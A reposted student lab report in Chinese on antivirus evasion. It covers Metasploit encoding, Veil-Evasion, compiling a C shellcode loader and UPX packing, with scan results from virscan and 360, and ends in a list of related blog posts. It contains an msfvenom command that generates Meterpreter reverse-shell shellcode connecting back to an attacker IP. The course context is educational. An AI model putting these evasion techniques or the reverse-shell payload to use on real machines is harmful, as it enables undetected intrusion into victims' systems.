Exp3 免杀原理与实践

使用msf生成后门程序的检测

  • 将上周msf生成的后门文件放在virscan.org中进行扫描

  • 结果很危险

  • 使用msf编码一次进行扫描

  • 使用msf编码10次进行扫描

  • 结果同样很危险,所以单纯改变编码次数并不能免杀。

使用veil-evasion生成

  • 下载安装完成veil-evasion

  • 设置生成免杀文件

  • 生成成功

  • 开启监听

  • 回连成功

  • av测试警告,只剩5个了很不错

使用shellcode编写程序

  • 这个步骤我做了好多次,因为虚拟机ip总在变化,变化一次就要重新生成一次shellcode数组,所以以下截图中ip不同常在。

  • 首先执行命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=443 -f c 生成shellcode数组。

  • 根据这个shellcode数组写出c程序,然后编译c程序生成可在64位windows执行的程序。

  • 将这个可执行的程序拷到windows中。然后在win中运行,kali中监听。但是不好使。

  • 只能在win中下载vs,然后用vs编译生成那个shellcode程序。

  • 生成好了文件,在kali下设置监听

  • 运行文件,获得回连

  • av查杀警告5个,也不错

  • 特意看了一下360,没有用hahaha

给shellcode加壳

  • 使用upx命令加壳

  • 将加壳程序拷到win中,然后跟之前一样,监听,运行加壳程序。回连成功。

  • av查杀警告7个,这壳白加了,要是想用它搞事情就不能用这个了。

  • 但是看了一下360,还是没查出来。

  • 由于都是用虚拟机做的,之前的win上没有安装杀毒软件,然后安装杀毒软件,重新做了次回连。

  • 又用360扫描了一下,只有之前没做免杀的后门被扫了出来

基础问题回答

  • 杀软是如何检测出恶意代码的?

  • 基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测;网上答案跟老师讲的差不多

  • 免杀是做什么?
  • 不让杀毒软件查出来。
  • 免杀的基本方法有哪些?

  • 改变特征码、改变行为;参考免杀百度百科“免杀”(跟老师讲的差不多)

转载于:https://www.cnblogs.com/lhyhahaha/p/8782413.html

20155209 林虹宇 Exp3 免杀原理与实践相关推荐

  1. 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  2. 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

    目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...

  3. 20164301 Exp3 免杀原理与实践

    Exp3 免杀原理与实践  1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应 ...

  4. Exp3 免杀原理与实践 20164323段钊阳

    网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...

  5. 网络对抗 Exp3 免杀原理与实践 20154311 王卓然

    Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的?  ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件. ...

  6. 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践

    2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...

  7. Exp3 免杀原理与实践 20164321 王君陶

    Exp3 免杀原理与实践 20164321 王君陶 1实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分), ...

  8. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  9. 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5

    <网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...

  10. 20145307陈俊达《网络对抗》Exp3 免杀原理与实践

    20145307陈俊达<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的 ...

最新文章

  1. 分享一款jQuery全屏滚动页面特性案例
  2. 设计模式复习-享元模式
  3. 我在定制office 2007时遇到的问题
  4. (65)如何根据句柄从二级、三级结构句柄表中找到内核对象
  5. 做重?做轻?关键是要解决客户问题
  6. 关于在linux下搭建VSFTP下匿名不能上传的问题
  7. MTM:matlab实现5主函数解码
  8. python3 爬虫4--解析链接
  9. C linux Debug
  10. c语言 将url图片存到本地_python爬虫:爬取男生喜欢的图片
  11. Codeforces Good Bye 2015 A. New Year and Days 水题
  12. TensorFlow入门:TensorFlow工作原理
  13. 华为荣耀鸿蒙系统升级名单,华为鸿蒙系统正式版首批升级名单公布:这8款机型用户有福了...
  14. shell脚本批量生成配置文件
  15. SpannableString 给TextView添加不同的显示样式
  16. 计算机五笔教案ppt,计算机基础课件五笔打字.ppt
  17. 【寒江雪】Go实现模版方法模式
  18. 万网域名修改 DNS 方法
  19. CS-Notes 知识清单 备战版
  20. Java发送短信验证码

热门文章

  1. hdu 1004(排序+统计)
  2. WebLogic—安装
  3. v8go 库手动编译 v8 golang 库手动编译
  4. C++11 std::bind
  5. MySQL 索引底层实现原理(B-tree、B+tree)
  6. 微服务学习之消费模块【Hoxton.SR1版】
  7. lnmp mysql 命令_LNMP状态管理命令
  8. connect to host master port 22: No route to host 问题解决方案
  9. linux mysql libc.so_Linux libc依赖包问题如何解决?
  10. jpa删除数据后数据库无修改_jpa删除数据库